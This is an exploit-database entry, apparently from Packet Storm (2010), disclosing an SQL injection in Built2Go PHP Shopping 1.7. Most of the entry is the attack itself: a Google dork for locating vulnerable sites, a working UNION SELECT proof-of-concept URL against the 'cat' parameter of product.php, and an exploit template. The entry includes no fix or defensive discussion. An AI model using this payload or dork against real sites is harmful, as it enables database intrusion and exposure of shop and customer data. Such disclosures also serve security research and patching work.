Built2Go PHP Shopping 1.7 SQL Injection

2010-12-23T00:00:00
ID PACKETSTORM:96929
Type packetstorm
Reporter Br0ly
Modified 2010-12-23T00:00:00

Description

                                        
                                            `Script Name: Built2Go PHP Shopping ( version ) <= 1.7  
Site: http://built2go.com/  
Script Demo: http://demos.built2go.com/shopping/1/  
Found: Br0ly  
Google Dork: "Powered by Built2Go PHP Shopping"  
  
p0c:  
  
http://server.com/product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3/*  
  
xPloit:  
  
http://server.com/product.php?cat=[sqli]  
  
Brazil ;D  
  
`